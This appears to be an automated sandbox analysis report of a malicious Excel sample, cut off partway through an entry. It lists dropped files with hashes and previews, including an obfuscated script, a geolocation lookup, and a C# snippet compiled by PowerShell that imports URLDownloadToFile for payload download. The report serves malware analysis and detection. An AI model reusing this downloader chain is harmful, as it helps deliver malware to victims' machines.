                                                                                                                                                                                  Preview:...... . . . .....c.b.u.s.j.O.L.Z.c.m.W.J.G.a.f. .=. .".i.L.Z.L.U.h.n.U.k.U.L.U.L.W.o.".....o.i.t.K.U.W.i.I.G.L.K.i.S.K.a. .=. .".K.i.L.d.N.L.m.c.K.L.j.L.a.q.A.".....h.d.a.L.O.L.L.A.a.L.P.p.k.L.i. .=. .".W.o.K.i.x.K.L.Z.u.m.t.A.d.z.b.".........c.L.c.P.G.P.L.B.B.L.L.W.z.p.B. .=. .".t.g.u.b.W.K.t.A.z.h.n.R.l.p.v.".....t.f.O.h.l.Z.c.i.B.z.n.n.Z.l.G. .=. .".x.i.e.f.W.s.p.L.e.L.G.L.G.o.n.".....Z.K.K.z.O.N.e.U.i.e.P.I.O.k.r. .=. .".H.k.n.p.q.u.W.L.G.i.T.L.t.o.d.".....B.d.k.d.O.K.Z.A.v.P.K.z.N.u.U. .=. .".q.L.R.G.P.l.u.G.P.k.L.f.W.c.o.".....K.L.x.W.L.k.s.f.G.t.G.l.U.l.f. .=. .".L.f.A.u.b.N.L.W.B.N.o.L.L.m.Z.".....W.t.i.A.U.L.K.W.Q.x.h.W.c.z.q. .=. .".v.I.k.J.L.A.W.x.Z.z.K.c.f.u.i.".....p.i.B.e.K.O.x.G.m.U.U.i.W.B.v. .=. .".U.m.p.Z.c.c.L.q.W.L.r.K.L.a.K.".....x.H.L.N.f.u.n.W.G.b.o.H.l.W.i. .=. .".A.W.Q.C.N.L.B.m.Z.f.W.N.H.x.j.".....v.q.B.G.l.m.u.H.h.K.g.a.L.J.L. .=. .".x.g.k.S.P.R.e.O.U.h.L.o.U.e.K.".....a.b.U.z.L.L.Z.i.v.i.d.W.W.G.o. .=. .".C.j.S.A.z.G.L.C.c.p.R.G.L.L.W.".....c.K.G.C.R.L.i.I.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                  Entropy (8bit):5.014904284428935
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                  MD5:B66CFB6461E507BB577CDE91F270844E
                                                                                                                                                                                  SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                                                                                                                                  SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                                                                                                                                  SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9020D2DA.emf

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1293620
                                                                                                                                                                                  Entropy (8bit):4.563127917199792
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                                                                                                                                                  MD5:F71C973B5E362DFD6408D6C009E5643E
                                                                                                                                                                                  SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                                                                                                                                                  SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                                                                                                                                                  SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97AC39D7.emf

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):109544
                                                                                                                                                                                  Entropy (8bit):4.282675970330063
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                                                                                                                                                                                  MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                                                                                                                                                                                  SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                                                                                                                                                                                  SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                                                                                                                                                                                  SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8531221.emf

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1293620
                                                                                                                                                                                  Entropy (8bit):4.563127917199792
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                                                                                                                                                  MD5:F71C973B5E362DFD6408D6C009E5643E
                                                                                                                                                                                  SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                                                                                                                                                  SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                                                                                                                                                  SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DAAA11AE.emf

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44256
                                                                                                                                                                                  Entropy (8bit):3.147465798679962
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                                                                                                                                                                                  MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                                                                                                                                                                                  SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                                                                                                                                                                                  SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                                                                                                                                                                                  SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8C999EC.emf

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44256
                                                                                                                                                                                  Entropy (8bit):3.15066292565687
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                                                                                                                                                                                  MD5:F1EC2E98B0F577B675156B13DCF94105
                                                                                                                                                                                  SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                                                                                                                                                                                  SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                                                                                                                                                                                  SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\02xt0lnw.lkj.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1uhrwxaw.4hi.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2uxbake4.k3c.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RESBBA2.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Dec 3 13:01:09 2024, 1st section name ".debug$S"
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1328
                                                                                                                                                                                  Entropy (8bit):3.9827563147538427
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:HQe9E2Ub/dHuwKdNWI+ycuZhNqHakSjQPNnqSqd:IZtKd41ulqHa3jIqSK
                                                                                                                                                                                  MD5:5B9471C2931FADEA3575C3B64F115D66
                                                                                                                                                                                  SHA1:92E49D1C0DD289E8AD9EB380E9DDDD1240FCED08
                                                                                                                                                                                  SHA-256:13FA9DAEA8DE018C4A4A599D8CF8B7E7A273F853488DD7A7BED459514DA9A1DC
                                                                                                                                                                                  SHA-512:A8F1BAF7EDEDAAD1A615B903A0D359235565F4E3D40EC3010332E1DE16140DEECFDD3B8791B5CE39D785664A5BB8D194CF26FE098B184CEE6F9DB20C13622519
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:L.....Og.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP..................0..'E.+.; ..........4.......C:\Users\user\AppData\Local\Temp\RESBBA2.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.i.e.t.g.s.5.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RESF4EA.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Dec 3 13:01:23 2024, 1st section name ".debug$S"
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1328
                                                                                                                                                                                  Entropy (8bit):3.972409640922591
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:H2e9EurCTedHxwKdNWI+ycuZhNnOakSOPPNnqSqd:zrcu6Kd41ulOa3qqSK
                                                                                                                                                                                  MD5:DC31E203A1FC0179907B250D72C74CFC
                                                                                                                                                                                  SHA1:FCD05AECFC52637FB159765240F0DB7C7BD08AFA
                                                                                                                                                                                  SHA-256:E0B97148B6F6F7FB2A572CCCA5B85D524C43F34837D463D5ADCAD7CC5672D1EC
                                                                                                                                                                                  SHA-512:802164D3DF9A81900922FB9EDC624E3379292AA77066F067057CD62269D43DE826873C6FC79BFBCFD2C1F359E1FB080914BFDB862B8AC7B56405FAB20504A0BE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:L...#.Og.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP................j.>.i....C'+.&...........4.......C:\Users\user\AppData\Local\Temp\RESF4EA.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.c.3.e.r.l.e.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bhv5265.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x028a0300, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):21037056
                                                                                                                                                                                  Entropy (8bit):1.1360490195156638
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:K91U91o2I+0mZ5lEHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:K9EXaLuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                  MD5:F2226ED90194EE3B174DE8E1216EE492
                                                                                                                                                                                  SHA1:3AE19280053E5766EE6137E4CA0723066A35033E
                                                                                                                                                                                  SHA-256:F48297DDF8948B4C3992FB1E28A0D90F45AB4631BDEB73A882E2D73488C3A662
                                                                                                                                                                                  SHA-512:7800022169D7661119C23D20235298619091F8DBE41AC3CB237F30E7DC070B347542DF993BFB924B7E232D8F9A6C89FE8477A10941091A2815D61415C8269252
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....... ........................u..............................;:...{..3....|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\dxnpf0vr.gmm.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\jht0jvwi.nad.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\m44eowyw.glb.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                                  Entropy (8bit):3.08388015659087
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQHak7YnqqjQPN5Dlq5J:+RI+ycuZhNqHakSjQPNnqX
                                                                                                                                                                                  MD5:879F0A30F8E382AE2745162BE4A23B20
                                                                                                                                                                                  SHA1:2537FB0FC0346F73F058F8DF9928C4B43134686A
                                                                                                                                                                                  SHA-256:43AD03072524B0855F2DF757F8495A1FD75D82EC9B4235D24B1538F89EF5C038
                                                                                                                                                                                  SHA-512:6F5DDBF2B90BED804A4FA744A601A8F321A9D4D8770DA2C8A5CB2B1E337BD8E550EA20123FCF89272EE6E98703626E4C954A689C7C3BFFEC07305477E79E287B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.i.e.t.g.s.5.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.i.e.t.g.s.5.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.0.cs

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (367)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):488
                                                                                                                                                                                  Entropy (8bit):3.9754005389217877
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:V/DsYLDS81zuAi04tNkmMGlhbQXReKJ8SRHy4H/aQm4bV51j/As1W9y:V/DTLDfuAiJPt2XfHraQxp3Msk9y
                                                                                                                                                                                  MD5:3B52E3D1532B0BEB731C47FE5CF04437
                                                                                                                                                                                  SHA1:7135F88114807B36BE4B96E49E2ED21C1C2E48E1
                                                                                                                                                                                  SHA-256:D89D61099F569F77396FEFCDA11858CDC45FECC437AFA5204B654A63C0393AD8
                                                                                                                                                                                  SHA-512:D49EEB4817FD128B9C27930CC82388D17678684C56B9A92AA3F52154485CA0ED2E168849F9E7FC1815ADCA53B0AD57F525464087B4C3D9E14D02423D8939F8F2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace KqzGjT.{. public class ZxzNKYoGJwP. {. [DllImport("urLMOn.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr GjhMmMvqGKG,string lhSK,string CQBAeZT,uint ICEcRdeIUx,IntPtr pzxxzpmI);.. }..}.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):369
                                                                                                                                                                                  Entropy (8bit):5.196921063157367
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fg4XIB4Xqzxs7+AEszIP23fg4XIB4Xdx:p37Lvkmb6Kz4aGaqWZEo4aGadx
                                                                                                                                                                                  MD5:2FE3D95C4FD373A6555BAF1AAC53C5A8
                                                                                                                                                                                  SHA1:B12D0FDFC8C71067B2965CD287CF07ED83548E7C
                                                                                                                                                                                  SHA-256:345FBA994F0F18925F32EF285B6791517D974C72451BF487CD5C36DE402E9B2D
